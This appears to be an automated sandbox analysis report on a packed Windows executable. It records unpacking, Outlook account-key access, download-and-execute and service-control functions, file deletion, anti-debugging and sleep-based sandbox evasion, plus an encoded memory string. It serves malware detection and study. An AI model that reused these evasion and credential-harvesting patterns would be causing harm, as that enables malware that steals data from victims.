                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.cfgJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 4.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 5.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 6.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00434006 push ecx; ret 0_2_00434019
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004567F0 push eax; ret 0_2_0045680E
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00455EBF push ecx; ret 0_2_00455ED2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832806 push ecx; ret 0_2_02832819
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000B146 push ecx; ret 0_2_1000B159
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1002343D push esi; ret 0_2_10023446
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0A4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0CC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00451D34 push eax; ret 5_2_00451D41
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00444E71 push ecx; ret 5_2_00444E81
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_00414074
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_0041409C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414039 push ecx; ret 6_2_00414049
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,0_2_00406128
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040E54F Sleep,ExitProcess,0_2_0040E54F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004198D2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeWindow / User API: threadDelayed 4761Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeWindow / User API: threadDelayed 5138Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-70147
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAPI coverage: 10.0 %
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep count: 4761 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep time: -14283000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 4904Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep count: 5138 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep time: -15414000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_028310F1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02836580 FindFirstFileExA,0_2_02836580
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_10005C00
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_10007E20
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,0_2_100073F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10018AD0 FindFirstFileExA,0_2_10018AD0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139350448.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2144560782.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4570038168.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4570038168.0000000000853000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139177976.0000000000853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2416400031.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /oZ5KvXlPlByrz8dZOGGcQgucCWvqvNNT5O3VEcyTdt31cd6tZQHZiOzQcZC8E22ETZKkgudAP+oUn2G+KcQQbBErMtKVCZBX1tsjmSu2SuFLZCAqXhI9FKzFE906Z2Be2GpMiub+uyTB2beHZ83XMdHeNHIAN/4LMoDxZbf05vsAqlTzcMWZ5kn2EQvW8S382ZMJYjBW++Y1oatCZgYUqKp9u6TaNSIF2TEDvtQNfQGaUsS7L0JVKfbZGyWA+S5rE3OIx9oWGlORaMqS90h6xgIArp0pvuywtTd7hyCA1zsj5AzYXmAOlYkuN5JpKphnYFwV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaM
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00442564 mov eax, dword ptr fs:[00000030h]0_2_00442564
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02834AB4 mov eax, dword ptr fs:[00000030h]0_2_02834AB4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10014BBC mov eax, dword ptr fs:[00000030h]0_2_10014BBC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,0_2_00410B19
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess token adjusted: DebugJump to behavior
